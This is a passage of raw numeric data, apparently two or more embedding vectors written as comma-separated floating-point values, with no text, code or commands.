481,0.016040424,0.0054387744,0.0069100396,-0.0069618816,-0.0058325175,-0.0008029213,-0.022946572,-0.008609995,0.016333867,0.021081006,0.0008982104,-0.018938873,-0.0012799843,-0.008587768,0.0012125693,-0.0015777877,-0.0012909551,0.0018504085,-0.013695403,-0.022097113,-0.008910422,0.008453701,0.015302531,0.012631529,-0.016810872,0.01872147,-0.006079586,0.011808959,-0.00021322898,-0.031017575,-0.14559159,-0.009389235,0.017861104,-0.0023700607,-0.0058922605,-0.021946905,0.012538463,0.008466783,0.041948393,0.008081747,0.0010247062,0.0076278234,-0.0136453,-0.004354852,-0.016912863,0.0011985757,-0.016969502,0.004220723,0.0041025137,-0.005790391,0.008017616,-0.022886245,-0.007711414,0.0068350397,0.006335277,0.011540702,-0.0017290335,0.024238678,-0.008411787,0.0068161264,-0.005707325,0.006430306,-0.012920256,0.0014075036,-0.05129933,0.009602127,0.00009082681,-0.0028453793,-0.006769644,0.026519585,0.0022764932,0.011155747,0.03718976,0.020295545,0.002426243,-0.017229725,-0.003272409,0.028367357,-0.002123884,-0.015352733,-0.0036490322,-0.0013218314,0.007125519,-0.012450139,-0.002022749,-0.020776682,-0.014265318,0.008438945,0.015360953,-0.0012398645,0.00031696272,0.0051681045,-0.011402845,0.014266516,-0.009198704,0.0014539071,-0.009420488,0.010488304,-0.012533136,0.015699198,0.0031106754,0.023396615,-0.0017370784,-0.018269058,0.020081233,0.006477373,0.0099024,0.025824476,0.015930679,0.00287749,-0.0016051857,-0.021444103,0.009132929,0.000031169595,-0.019922497,0.008428873,0.01791703,-0.0069171395,-0.013757036,-0.0043205833,0.013923867,-0.0005199137,-0.028122371,0.015573848,-0.014029034,-0.005670153,0.0629335,0.012199925,-0.032089118,-0.012010789,-0.004488725,0.006256357,-0.015561007,0.027729392,-0.009376198,0.029391354,0.018066222,0.005209102,0.004153537,-0.006252209,-0.0054505486,0.02039558,-0.0054248977,-0.0030854184,0.00038653702,0.0059764897,-0.023951244,-0.006625255,-0.0071053663,0.0020693503,0.007927301,-0.00785566,0.00041956414,-0.036355656,-0.01272216,-0.009962842,-0.025134264,0.02966582,-0.0068758857,-0.019193675,-0.0002738519,0.016243579,0.021689901,-0.010836278,-0.0030361142,0.0085746655,-0.010251001,0.015860612,0.024276895,0.012507818,0.019690666,0.0071854205,-0.002496161,0.010261121,0.0031276518,0.01565571,-0.013871383,-0.0007315695,-0.00053271576,0.005652073,-0.0022346629,-0.020449644,0.013285115,0.035557188,0.002568508,0.008396522,-0.013340851,-0.0038532866,0.013666296,0.010788743,-0.0032602134,0.02029014,0.023485668,-0.0012415429,-0.0032842201,-0.021860523,0.0028938972,0.0033275394,0.0019894391,0.017879685,-0.0004739118,0.0035849006,0.016088968,-0.057117205,0.014674844,0.01205133,0.008324674,0.021673696,0.032492645,0.028985463,-0.022774931,0.012354279,-0.007838131,-0.0133918915,0.018201262,0.020020159,-0.0012863978,-0.017580332,-0.010832362,-0.0024182862,0.029784871,-0.005992123,-0.008422974,-0.030258616,0.001505991,-0.0065838373,-0.003027999,0.025716703,0.0067504877,-0.010000431,-0.018136483,0.008799188,0.008002307,-0.0022475102,-0.00018245305,-0.0043070605,0.0019507441,0.014723839,0.012451789,-0.014496451,-0.012471444,0.021753099,-0.001112634,-0.004953096,0.009916353,-0.005411355,-0.0082748635,-0.014806437,-0.013431129,0.007062895,-0.0230065,-0.054852627,0.0063127684,-0.01725373,0.008020996,0.031655326,0.015345465,0.02833263,-0.010184625,-0.0062447404,-0.010196875,0.0017265695,-0.030879943,-0.009279807,0.020856336,0.008019804,0.021468459,0.004326287,0.013889425,0.01584525,0.029372621,0.022867939,0.030527443,0.01564782,0.013194467,0.0011436905,-0.007302181,-0.017588396,0.011662769,0.029540055,-0.0030527469,0.008729108,-0.0032420112,0.008446302,-0.0019285912,0.014093897,0.022900103,0.0042270613,0.0053074476,0.0067971284,-0.028183538,-0.020428777,-0.01628536,-0.020950468,-0.0046976926,-0.002947763,-0.008972268,-0.023339631,0.0105164945,-0.000827122,0.029315691,0.010181381,-0.0094330255,0.02457129,-0.025027717,-0.0058525605,0.009165163,0.0017318096,0.0055927197,0.0024258785,0.0019299141,-0.015855132,-0.0013154498,0.017162465,-0.0072709336,-0.0050075604,0.011135651,-0.0062600276,-0.01770318,-0.010200154,0.030224362,-0.013015206,0.0014380936,-0.000037618833,-0.006902795,-0.0070304913,0.007746888,0.009972452,0.000077162804,0.017098898,-0.0037627649,-0.028950932,-0.00030827653,-0.0044873776,0.007566569,-0.014487171,0.004049206,0.0061053033,0.0030641668,-0.014120129,-0.00441884,0.01913672,-0.020545993,0.020746907,0.009448948,0.0029934652,0.0008576536,0.0014503091,-0.03934105,-0.0071859453,-0.016858626,-0.02194816,0.02056446,-0.010644472,0.028007265,-0.0025748517,0.0033265038,0.008408529,-0.015159551,0.009109972,0.021063054,-0.038200505,-0.020502888,0.006137502,0.011429009,0.0053071575,0.026585404,0.022073047,-0.017815461,0.021822207,-0.014422764,0.015728714,0.0011271618,0.003164906,0.005978731,0.015052936,0.0018688678,-0.014756621,-0.0004525637,0.0010087708,-0.0069040637,-0.00034276984,-0.0038358534,-0.008220081,0.0051915133,0.013342284,-0.020319248,0.001793123,0.018217335,-0.0045228824,-0.009656202,0.022823688,-0.012248831,-0.019478416,0.0021687956,-0.0069891443,-0.024608556,-0.008723646,-0.031070722,-0.000024429877,0.014831493,0.021101762,-0.018055053,-0.037546113,0.014489644,-0.0950609,-0.011971816,0.00017550607,0.0038830955,0.024494322,0.009014855,-0.010715754,-0.017460827,0.0024694223,0.012169132,0.011922995,-0.004576746,-0.030457823,0.00090901693,0.02542258,-0.012087025,-0.002778639,0.011016109,0.012736001,-0.021171141,0.0005023256,0.007986249,0.0046030628,-0.004896611,0.010215615,0.006695338,0.0030675945,-0.0062356275,0.0045385403,-0.02121783,-0.011871448,0.002171947,0.0031678411,0.016599642,-0.0068090423,-0.008348172,-0.0055251243,0.00774572,-0.01801853,-0.05170551,-0.0036158229,0.011838231,-0.0064904755,-0.005703766,-0.014967459,0.01911093,-0.02822178,0.002672381,-0.014959474,0.010346487,-0.016043935,0.011625351,-0.0099666845,0.003979942,-0.010283926,0.018638793,0.005811065,0.00026812713,0.015726816,0.0012161909,-0.033387978,-0.0033328438,0.011138228,0.004314422,-0.008854963,-0.0020419029,0.0066975844,0.012194836,0.0020288741,0.0078235855,0.017397746,-0.029936355,0.013879351,-0.024929162,-0.000635189,0.012477987,0.016760688,-0.006381379,0.008008776,0.022415424,0.032944128,0.002154083,0.01316851,0.018100996,0.029478768,-0.0044383244,-0.00028248582,0.0067987386,0.025122067,0.012332767,-0.017496599,-0.009292477,0.033781007,-0.0011780259,0.017513476,0.014592524,-0.024279056,0.004355146,0.00025677806,0.005161458,0.0030704066,-0.015929554,0.0010589482,-0.0033335995,-0.021350803,0.00807733,0.010835817,0.001716325,0.003539932,-0.009364179,-0.010011859,0.02061899,0.018397449,0.054041274,0.022489058,0.0015564105,-0.011857746,0.019410556,-0.005563208,-0.024618419,-0.010604492,-0.018121153,-0.020051785,0.031398386,0.0073881266,-0.006121826,0.0068317843,-0.011261436,-0.018519334,0.017092409,-0.010849794,0.043358058,0.021395149,0.012155267,-0.012457703,0.005952645,-0.035430487,0.013997513,-0.006600758,0.011192187,-0.0006078903,-0.023480766,-0.003777109,0.007670744,-0.023586366,0.019140031,-0.012108594,-0.023954915,0.020884812,0.0019403701,-0.006644762,0.00007195846,0.01120914,-0.0011245074,0.002766167,0.006096758,0.006984368,0.00829168,-0.01469963,0.0009702424,0.0015418001,-0.007802279,0.024545282,-0.0062053767,-0.03263429,-0.0055420296,-0.0067559,-0.007002104,0.012981219,-0.012192828,-0.02445913,-0.00023241265,0.006774344,-0.01264559,-0.01908272,0.001053691,0.015486878,0.0291705,-0.011376869,-0.01779549,-0.01250644,0.010624331,-0.0060412325,-0.0344603,0.003974627,-0.009696695,0.0033347774,-0.0020664725,0.015171667,0.008366761,-0.0031037326,-0.0029099646,-0.014978498,-0.01901023,-0.018847922,-0.01719367,0.022767523,0.0015747107,0.0049915635,0.0073363804,-0.019277174,0.0069677928,-0.0076321536,0.0072027654,0.016598275,-0.0102099525,-0.0019060172,0.016992943,-0.014639407,-0.013202156,-0.011637536,0.01364184,-0.002792272,0.1270125,-0.0030586424,-0.015300241,0.023906063,0.02923024,0.013180919,-0.0015902139,0.009651544,0.008483367,-0.012088919,0.019556733,-0.0077021755,-0.000042887234,-0.013615328,-0.011529423,0.021613216,0.0075699906,-0.010357634,0.0058637927,0.01175903,0.019138647,-0.013140401,0.0006435104,-0.0630191,-0.01635671,-0.04881064,0.03437797,0.015093827,-0.006141331,0.031504802,-0.004107925,-0.016361434,-0.0023756318,0.010983912,-0.022786785,0.02632124,-0.010892565,-0.022934787,-0.007954947,-0.017642448,0.019187769,-0.0032231635,-0.009424718,-0.005514262,0.0028590236,-0.012671427,-0.0020541914,-0.0012098904,-0.022507673,-0.008587393,-0.0036723344,-0.0040328368,-0.0031459078,-0.013059725,0.010948333,-0.004441223,-0.0040213196,0.011450723,0.028818436,0.005101688,-0.0010771389,0.007731999,0.0014958793,-0.00797001,-0.008792235,0.0006971246,-0.023293462,-0.0031660045,-0.0022951812,-0.013619676,-0.011900344,-0.025685446,0.026105741,0.008231663,-0.012663826,0.0017680944,-0.0069116447,-0.0090874415,0.0006257408,0.00084781373,-0.0010326598,-0.0073621017,0.0009796242,0.027986728,0.004045767,0.0012504619,-0.007815353,0.021133691,-0.0159746,-0.009431199,-0.010655938,0.01201293,0.031215966,0.016897013,-0.00015670195,-0.0026316573,0.01828199,-0.0073207854,-0.012712531,-0.014690616,-0.011452765,-0.008611753,-0.00750302,0.000008821198,-0.0030880168,0.006007225,-0.00013757989,0.003782412,0.000512172,-0.0015765039,-0.0009984941,0.007814608,0.007266431,0.016328264,-0.008830049,0.02654472,-0.0047488473,-0.008766527,0.01937087,-0.02039215,-0.01590542,0.004786893,0.015272431,0.029682256,0.0230045,0.01644197,-0.011728907,-0.0000871813,0.0048096636,-0.008901078,0.0058557065,-0.018989278,0.017927388,0.022266079,-0.006748308,0.0025350724,0.0017795238,0.019425532,0.009372135,0.019087454,0.005118016,-0.0040853815,-0.00678792,0.00025025327,-0.004907069,-0.016486995,0.027089035,0.0032754964,0.019782132,-0.01216645,-0.0025764934,0.012062074,-0.03229307,-0.013193146,0.013407015,-0.013881648,-0.002326797,0.01692155,0.0067006587,-0.007293039,0.0049425736,0.0020644793,0.006042852,-0.05797013,0.021078404,0.022316696,0.008156776,0.0022066033,-0.0017777999,-0.010786834,-0.005426082,0.004046308,0.009407129,0.021263564,-0.009079564,-0.016520517,0.0075144703,0.0085023185,-0.027268704,0.012582423,0.022659382,-0.008879798,-0.0015948322,-0.0063683814,0.035506465,0.0006436471,0.0047241976,-0.01292138,-0.025039563,0.039519515,-0.014424531,-0.0143419765,-0.0015996579,0.0029910265,-0.0063959607,0.015336148,-0.021670043,0.03603656,-0.031450868,-0.029595075,-0.0017369785,0.009406719,0.018081635,-0.012031876,0.015200181,-0.005526538,-0.0025025166,-0.013304246,-0.010946509,0.008030492,0.010155248,-0.006627356,-0.010654247,-0.04579774,-0.010134337,0.0030070364,-0.0033936698,-0.010970824,-0.0007853607,-0.011708143,0.009312048,0.004693719,0.01435374,-0.023268772,-0.01346125,0.008708428,0.000738825,0.0057175118,0.0147894975,-0.017254896,-0.017157128,0.015380357,0.0050703376,-0.0052574063,-0.027069336,0.004548624,0.017746212,0.02763522,-0.0042855195,0.0076223654,-0.0062953983,-0.0066577517,0.020144468,-0.01809097,-0.015975421,0.023622436,-0.012809394,-0.00388098,-0.014129367,-0.021630215,-0.028581757,-0.0070315064,-0.015320474,-0.019973189,-0.03270208,-0.026935615,-0.0046713497,0.02161081,0.016604971,-0.015126059,0.010437755,0.039168205,-0.017027179,0.005698644,-0.00940419,-0.00972674,0.0024821374,-0.017225064,-0.0023340166,0.004592231,-0.0049046353,0.014294971,-0.0060839844,0.003054134,-0.004724358,0.0018488589,0.00056085957,-0.0068788305,0.018090134,0.000757218,0.0024820683,-0.013354144,0.0031157576,-0.01226029,-0.011913647,0.010067618,0.0022952366,-0.0025795817,0.041865688,-0.06365888,-0.0099469265,0.0019872596,0.015223469,-0.032607064,0.034925964,0.010645782,-0.037542243,-0.036544405,0.009953878,-0.0025373264,-0.008472673,-0.040064003,-0.011551055,0.0016811986,-0.014650559,0.001834319,0.024074677,-0.01543097,-0.025897224,-0.0117087,0.0028787935,0.002746991,0.0029175382,0.0025026794,0.013900158,-0.010049314,0.0020070765,0.0060858903,0.013297979,-0.0040402208,0.0027511003,-0.03102605,-0.0024177912,0.02776784,0.006215054,0.007633412,0.020444492,-0.009458615,-0.025455778,0.0010841703,0.000007209823,0.018122818,0.013644607,-0.014573415,-0.01965525,0.021873668,-0.020841936,0.13334446,-0.019177867,-0.0099047525,-0.00840084,0.0036260267,-0.0063601714,0.0067907763,0.026638601,0.01170914,0.018278599,0.0037991481,-0.0038507297,0.00599791,0.017203487,-0.0049758237,-0.004533972,-0.0035387112,0.12683931,-0.01146908,0.022883274,0.009243297,0.007393898,-0.0019109427,0.008976924,0.006247699,-0.06929553,0.008762431,-0.033719733,-0.0014989214,-0.009655753,-0.04280495,0.021943051,0.0107569285,-0.0039125965,-0.006532309,0.01957022,-0.005836668,0.0012540217,-0.03473534,-0.011493085,0.0041358117,0.024186673,-0.012938589,0.0004961129,-0.021992533,0.006653753,-0.046781328,0.021573568,0.001752714,0.012894421,-0.0019221612,-0.023945965,0.03524622,-0.012110932,-0.0045498502,0.002976122,-0.00005823291,0.00067987817,-0.01737583,-0.000616351,-0.0060763448,-0.0015741317,-0.0008491746,0.015041673,0.0033631008,-0.018027687,-0.0073240134,0.0029042596,-0.008341141,0.010884316,0.026937332,0.032608133,-0.012759007,-0.0054010414,0.04496584,0.0035408868,-0.009613216,-0.009824237,0.013995865,0.007545247,0.03061087,0.012499038,-0.0010965636,0.00056230504,-0.010685363,0.02136191,-0.005075895,0.007308224,0.012466072,-0.0037250163,-0.017353438,0.006797557,-0.007794274,-0.026243642,0.018934643,0.03385839,0.00002324808,-0.0056057153,0.0059683877,-0.009572213,-0.004760588,0.02497779,0.004315094,-0.022181828,-0.016013816,0.008733389,-0.012067889,-0.02887787,-0.010215079,0.007544051,0.0059316386,0.0047238884,-0.010047793,0.012623604,-0.01955847,-0.007775585,-0.00036144425,0.0017810834,-0.02576435,-0.0026342152,0.0105184335,-0.0012628905,-0.00792367,0.019274805,-0.024634445,0.006565736,0.010977417,0.018456709,-0.0076438216,-0.031866618,-0.02467473,0.0036017136,0.012743033,0.056316637,0.0030788034,-0.020954452,0.028626991,-0.010579073,-0.014225219,0.00023252571,0.0008858469,0.005322823,0.009399409,0.008869738,0.005214534,0.0011306483,0.010255896,-0.033603247],[0.0026487391,-0.007874873,-0.000024902014,-0.014722924,0.014655468,-0.013213683,0.002930741,0.008442029,-0.007880457,-0.022425357,-0.00456431,0.0064190174,-0.011611839,0.0034256824,0.004903456,-0.017441295,0.0022891501,-0.007831037,-0.0119625125,-0.016904455,0.0013319436,-0.014008924,0.0036186697,-0.0036319357,0.012944501,0.0010321094,0.0066974456,-0.02372357,-0.005413543,0.012412391,0.006326895,0.033928845,0.014602589,0.00246477,0.012909235,-0.007183758,-0.00053812796,-0.009619894,-0.001735986,-0.0296003,-0.021483313,0.015119378,0.017302737,0.015292468,-0.009381971,0.015110266,0.023743752,0.012780689,-0.03077369,0.020103749,0.0014746824,-0.007757814,0.008218865,0.03056793,0.011236356,0.026274184,-0.005304235,-0.020744652,0.023428457,-0.024379753,-0.0008641794,0.015765896,-0.017840333,-0.016802173,0.017915871,-0.03350892,-0.0055242437,0.006676164,-0.014089602,-0.0071187555,0.006952893,-0.0049235662,0.0014974689,0.0049124197,0.0041342415,0.010740403,-0.0031728025,-0.01692555,-0.010421965,0.03148999,0.018210966,-0.023557814,0.011731512,-0.002372023,-0.007637618,-0.0025172252,-0.014196359,0.005981343,-0.005306525,-0.02958858,-0.019029094,0.0057422305,-0.0058838925,0.0077659003,-0.021145044,0.02703589,0.011658214,0.013982326,0.0060001304,-0.002348131,-0.0056237914,-0.0076512913,-0.045800906,0.019360567,0.012305659,-0.019195948,-0.014904143,0.0054151597,-0.02030743,-0.019915286,0.003786152,0.008645065,-0.0077116867,-0.016777776,-0.0017479457,-0.0063600293,-0.0011450708,-0.0016416828,0.0076952237,-0.019718034,-0.0060991743,0.011313389,0.026746852,-0.014984686,-0.019244565,-0.0025299103,-0.018434854,0.01124651,0.010991211,-0.013387789,-0.010418335,0.027221361,-0.00576611,-0.0032530716,-0.0056313244,-0.01082215,0.0036355301,-0.02717303,0.0062151817,-0.017908372,-0.008639581,0.01069345,0.019454813,-0.0055528227,-0.0050236634,0.03244277,-5.4406556e-8,0.026853291,0.006722733,-0.01775823,-0.000090551606,-0.0028774643,0.019329365,-0.012695741,-0.005419473,0.0046376116,0.0039479407,0.006129564,-0.0072459993,0.025221296,-0.024582533,0.025462523,0.009328763,-0.018592732,-0.018912615,0.006345794,0.0035436132,-0.023963394,-0.011993074,-0.008307855,0.015086485,0.020452755,0.01716891,0.0017790626,0.019036906,0.031168189,0.026927456,0.009935238,-0.004262424,0.017419921,0.015655573,0.022139532,0.0023180817,-0.0069907443,0.0080664335,0.0058578746,0.0087146005,-0.019489743,-0.02288716,-0.0029533322,0.0065145995,-0.015187825,0.002620503,0.0060606045,-0.0039469367,-0.025200034,-0.019381275,0.11029288,0.009265139,-0.0011353903,0.0044948133,-0.0000069020084,-0.021739868,-0.010371677,-0.0075862748,0.013512753,-0.029656816,-0.0062769135,0.008577625,0.00722001,0.0059080357,-0.003914883,0.0010144035,0.012213231,-0.0033794635,-0.064686716,0.01268747,0.01200237,0.033813126,0.0068950416,0.0031540922,0.008561196,0.004393089,-0.029823488,-0.0056125806,-0.02610405,0.015286871,-0.009885706,0.004833312,-0.029781478,0.008918474,0.0084963245,-0.0058537433,-0.011610394,-0.010536844,-0.042547386,-0.00058011245,-0.01818927,-0.016093098,0.005269163,-0.014068452,0.008188422,0.015504674,0.04614025,0.0022757996,0.0012765666,-0.0008169006,0.009520052,-0.011075949,0.008101656,0.019746918,-0.003187168,0.013110671,0.025458077,-0.0123326415,-0.0054950174,0.008763467,-0.00435386,0.016360123,0.017595317,0.019324036,0.026219502,-0.015092308,0.029463284,0.0364816,-0.0006731204,0.005274306,-0.044542205,-0.01739728,-0.018323975,-0.01241493,0.011197438,0.0055556213,-0.0039561773,0.023948299,-0.019300558,0.011572785,-0.015091045,-0.026771275,0.0032359788,0.0054981536,-0.004742692,0.017049525,-0.019259857,-0.0010496642,-0.00022096571,-0.011531084,-0.007735122,0.032498617,0.005317381,0.022698093,0.0035010919,0.029754883,0.022229062,-0.0075601786,-0.024139753,-0.012873541,-0.00055792305,0.009760625,-0.011840372,0.0072316886,0.0015529991,0.027858593,-0.01490307,-0.01719169,-0.01736221,-0.0077976035,0.01375466,-0.012250639,0.0006056296,-0.007513713,-0.025731169,-0.01959097,-0.009688019,0.008229393,0.00886183,0.012872715,-0.012949005,-0.0039064153,-0.00279789,0.021437008,-0.03222415,-0.003384996,-0.026325317,-0.015293532,-0.0018597104,0.0036115295,-0.008098037,-0.0048773317,0.035007305,-0.018026715,0.0065107397,0.03148015,0.011638849,-0.033245653,0.036478113,-0.01850134,0.029758781,0.017613938,0.022349205,-0.008234322,-0.010027179,-0.0061824056,0.0041038524,0.002375572,-0.017424941,-0.0034521883,0.014186979,0.011725678,0.016127992,0.03161184,-0.0058856886,0.005756038,-0.0046451874,-0.01732392,0.0024644635,-0.005369692,0.0002391979,-0.00554601,-0.01576122,0.010800756,-0.0077231857,-0.0034593916,-0.0015678445,0.068414874,0.009486825,-0.0057074046,0.025606617,-0.0062215617,-0.004577192,0.048270226,0.0012998161,0.0059176628,-0.017712466,-0.025852395,0.001062391,0.0014025478,0.023027161,-0.014466228,0.012629989,-0.023117434,-0.01815466,-0.007006941,-0.022570228,0.04141594,0.01735462,-0.0038833346,0.009690083,0.0124147395,0.009836068,0.0036748573,0.009296092,0.01501422,-0.024276026,0.0009096134,-0.005458922,0.015054438,-0.0038288657,-0.02760766,0.03326813,0.0016679532,0.002443943,0.01519461,-0.022941297,0.008544292,-0.0072508873,0.011795697,-0.024271762,-0.00933466,0.04519121,-0.00014416278,-0.010019165,-0.020057054,0.013643665,0.008995677,0.018936928,-0.018505266,0.021810118,-0.018878438,0.031426325,0.011023925,-0.040867325,0.025333937,0.028268022,0.032213937,0.020508584,-0.018965686,-0.0073902346,-0.0050478545,0.0458947,-0.0054948376,0.016032718,-0.01209481,-0.0153253265,0.016292555,0.03326367,-0.007932638,-0.00035671613,-0.0030150511,0.0014008099,0.0121814795,-0.006740305,0.0062709833,0.02104203,0.004531121,0.02469192,0.016109215,0.0044977493,0.0012787,-0.015432813,-0.010988004,0.008771943,0.013505599,-0.01487225,-0.021336786,0.020447927,0.035402976,-0.0071088984,0.0076640747,0.009549475,0.026133515,0.0012343648,-0.0057448144,-0.0069880127,-0.00035563004,-0.0043364493,0.008346683,-0.0067472714,0.0015275014,-0.011983379,-0.0071036746,0.0049797767,0.010423431,0.011583879,-0.01899279,-0.0030188565,-0.0037465056,0.0074608047,0.020650042,-0.021348162,-0.013549483,-0.012473364,-0.009994557,-0.013236577,0.025074,-0.02916906,-0.0015236287,0.0093462765,-0.007226833,0.021159757,0.0025004472,-0.011604535,-0.011486029,0.039446037,-0.0035178578,0.012907538,0.0063495245,-0.033884622,0.0055373134,0.00032020675,-0.021428354,-0.042420026,0.0316698,0.02278832,-0.008118641,0.021778814,0.03625389,0.007062813,0.00025814996,0.016181381,0.039478727,-0.0010397859,-0.0015337699,0.00812723,-0.010822555,-0.0036240632,-0.0022173543,-0.0086472845,0.0029572784,0.015283315,0.0114091365,-0.007977789,-0.003673077,0.027090367,0.0013521872,-0.03695772,-0.013020969,0.03573118,0.008493498,0.025411112,0.0069744163,0.03920017,-0.023315875,-0.008752754,-0.010514466,0.021580053,0.0038802074,0.0009412604,0.018733844,0.00252056,0.008886112,-0.006050038,0.0028950323,0.0051474427,0.008606597,0.002242375,0.0032026828,0.0071805003,-0.0050125527,-0.03239436,0.010772067,0.03400661,-0.008201534,-0.017131113,-0.016194636,-0.023507508,-0.0065739835,0.03142175,-0.0024495313,0.002565839,0.0062123,-0.025108175,-0.014358107,0.0060190125,-0.0026512465,0.023131927,-0.01031812,0.026110737,0.0016595041,-0.013851811,0.013524806,-0.0018916207,0.0033959094,0.02743666,0.013890898,-0.009978399,0.0010664584,0.0046169474,0.0053891116,-0.004431187,0.0039576325,-0.025164772,0.02616922,0.011996094,0.029247964,-0.015013568,-0.009632678,0.0051391264,0.00975305,0.005161079,0.011097181,0.009479562,0.008563996,-0.005077453,-0.03724386,-0.00620954,-0.0011864088,0.0124649145,0.0019603288,0.010771145,-0.037613332,0.009429821,0.02741434,-0.006126345,-0.0017774627,0.014418793,0.023543084,-0.005662799,0.027163189,0.009784346,-0.007904734,-0.0030488411,0.0050270855,-0.005673937,-0.023497412,0.031230295,-0.00692646,-0.0010435117,0.010803024,0.014325115,-0.01912498,0.0021820553,0.012874125,0.0007355868,0.037033916,0.019050464,0.003984657,0.0042145276,-0.02654872,-0.015878934,0.021138877,-0.01933648,-0.005978114,-0.0028799316,0.025799546,-0.023443233,-0.0015021266,0.031888917,0.022776304,-0.020993672,-0.003096899,0.00981781,-0.055979826,-0.0067281374,0.0037166933,-0.010086607,-0.0115440935,0.045709796,0.010097567,0.0022848472,0.012623648,0.015531165,-0.018986758,0.00028070886,-0.0058201924,0.008123472,0.026783897,0.0015684336,-0.012504414,-0.020659834,-0.012734757,-0.019878326,-0.009219358,0.026911682,-0.005782334,0.003900496,0.0014523292,-0.0025724971,-0.013270668,0.0017746482,0.0148904575,-0.024983624,-0.003092781,0.02091739,0.00091078744,0.008454312,-0.027886568,-0.016969364,-0.0005022418,-0.013930615,-0.013793,-0.009842263,-0.0073549063,-0.006572612,-0.032717664,-0.003621143,-0.020215275,0.034997605,-0.020817025,0.002522336,-0.0017352668,0.028202595,0.01057443,-0.0088297,0.0014247671,-0.0014426549,-0.0041370825,0.0076996037,-0.012593202,0.023821237,0.011043475,0.0075311298,-0.0076894276,-0.0035155176,-0.005663496,-0.017969025,0.0033555618,0.030986207,0.046407886,0.003834288,0.029456045,-0.0077203913,0.020610088,0.019995466,0.019992802,-0.009435702,0.006319476,0.022045892,0.0070037087,0.016856575,-0.011711755,0.0113912,0.009574019,-0.026039012,0.006327056,0.008422124,0.002653352,-0.0010014549,0.02138818,0.015013761,0.01714851,-0.0002447719,0.013394561,-0.015459268,-0.025960324,-0.0026503252,-0.013983605,0.013106736,-0.014613948,-0.020336868,0.00519748,0.0065282886,0.013298285,-0.024865314,-0.0013850122,-0.021968553,-0.002793352,-0.009571481,-0.013138287,-0.033865497,0.016795745,0.021859659,-0.02865607,-0.0114762895,0.004334,-0.013387088,-0.014099282,0.026754802,-0.013278867,-0.017826783,-0.01061392,-0.009765984,0.021607667,0.011576762,0.01882262,-0.01416377,-0.027900623,0.023009421,-0.011278412,0.0024700048,-0.005471226,-0.0013635237,-0.00016001606,-0.0011509727,0.0037953008,-0.010484976,-0.024603384,-0.018175466,0.029844152,-0.023076933,-0.0043794205,-0.01587857,0.00060030783,0.01649674,0.027428232,-0.011503237,0.024651784,0.01573624,-0.011124854,0.010245848,0.0013091705,0.0062495703,0.008637122,0.030458447,-0.01777911,-0.018325683,-0.022901298,0.010604138,-0.0063635823,-0.00030407956,0.008524949,-0.009940964,-0.018769529,-0.010176072,0.0059982026,-0.021330917,-0.002098829,0.0023834736,-0.052328683,0.011542138,0.0088078035,0.000019416064,0.011699302,-0.011445823,0.012575692,-0.03632969,0.0009845119,-0.041016113,-0.0265999,-0.0032655646,-0.03010656,0.00503087,0.009503896,-0.039610434,-0.028903088,-0.013636415,0.03715447,-0.0022922915,0.016569315,0.021990081,-0.017985929,-0.03752534,0.00498957,-0.009547853,0.011101696,-0.02201724,-0.0035756687,-0.018030701,-0.0069699604,0.004911901,0.0055375854,-0.010369363,0.0037410068,0.016563583,-0.0010238836,0.014855795,-0.01453609,0.0226467,-0.009786449,0.0019643172,-0.03235053,-0.010814686,0.008305574,-0.0024198373,0.023233961,0.01313731,0.012253298,0.023622056,-0.0012408802,-0.036869027,-0.027677992,0.0034465191,0.0074623283,-0.0017418927,0.0100900605,-0.005312672,0.006890516,0.0005032883,-0.00092127745,0.03194416,-0.008485968,0.0077465936,-0.0105288895,-0.0061238045,-0.025238913,-0.027301274,-0.0035884439,0.023695163,-0.010462462,0.0019324744,-0.005809198,0.0146679375,0.014938048,0.0011977904,-0.003467886,0.011737608,0.011698556,-0.01344569,0.0012289402,-0.00009737521,-0.0144328885,-0.012761843,0.016418643,-0.028862525,0.01541563,-0.010120168,0.017220842,0.0126731135,-0.0128742065,0.008710166,-0.014452467,0.009738129,0.02308745,-0.0088732885,0.0031678402,0.0031401215,0.021859214,-0.001500187,-0.011641425,0.010999724,-0.012942048,-0.006251315,0.007916595,-0.00043701043,-0.0017770764,0.029039206,-0.0141702825,0.014912538,0.024274874,0.002586261,0.03248141,0.007587635,0.0029923588,0.022835875,0.02489656,-0.016134094,-0.008881959,-0.015724039,-0.009941881,0.013639772,-0.0059516625,0.018753514,-0.028353356,0.010105785,0.0064307186,-0.0074531403,-0.007171527,-0.01188352,-0.028577315,0.020617524,-0.027603103,0.007140949,-0.0055230493,0.008633467,0.008143183,0.0033941937,0.029482108,-0.006900914,0.0016311983,-0.0045757503,0.0027304946,-0.00025249054,0.029092208,-0.009554566,-0.038902625,-0.0044017104,0.022050006,-0.018725675,-0.01119277,0.015924035,0.0036968365,-0.00028771226,0.046497148,0.012055792,-0.0071596797,-0.027782494,-0.024374666,-0.0011725482,0.013001509,0.014355686,-0.0043067355,0.0025336891,-0.007636818,-0.011685329,0.014649117,0.017378,-0.012303957,-0.01485705,-0.015917337,0.0069589443,0.0049554408,0.024154305,-0.0071370527,-0.02919377,0.018936554,0.004536118,0.021477604,-0.016147902,0.0049020336,-0.00070450996,0.0028212175,0.038619656,-0.012467143,0.03257968,-0.015818542,-0.023370761,0.024723098,0.009582916,-0.015569076,-0.0067916736,0.020226425,0.010507067,-0.023809277,0.004429895,0.0052830456,0.027632244,0.006708465,-0.015631245,0.010117908,0.0065236534,0.0052420134,-0.008622897,-0.01812273,0.008580803,-0.016581118,-0.010007647,-0.003197648,0.000037335634,-0.022779979,0.028734103,-0.027244642,0.022327388,-0.000549877,0.025042934,-0.0027268787,0.011664474,0.010717365,-0.012571408,-0.028063849,-0.00038517083,0.0076674414,0.023076408,0.014162481,0.005702213,0.0043950784,0.0211186,-0.00045655036,0.011886577,0.026962768,-0.0005447393,-0.026287975,0.028663546,0.00039261446,0.0014089731,0.0031885814,0.00042518214,0.037008487,0.016812066,-0.0030063952,0.018646108,-0.003295913,-0.0025186343,0.014743476,0.0022305658,-0.0017993795,-0.008707137,0.035664875,0.036042187,0.020585638,-0.0028837991,0.010953635,0.012601801,0.02471111,0.0035099746,0.030913582,0.0032686843,-0.01576537,-0.007833025,0.012170219,-0.0011076976,0.0035393361,-0.0025249408,0.012353075,0.00909582,-0.010559998,0.0059066145,-0.008128678,-0.019340502,-0.022633178,-0.0077026105,-0.0141148595,0.02845992,0.00421562,-0.006300881,-0.03048285,0.0015841774,0.016596625,0.017752372,0.0016519364,0.011070135,-0.0057567474,0.006828345,0.019914534,0.024511725,0.0028399453,-0.0033390087,0.01501487,-0.009527437,-0.02749936,-0.032450918,0.022582619,-0.00370608,-0.0401086,-0.006129326,-0.01087141,-0.02688997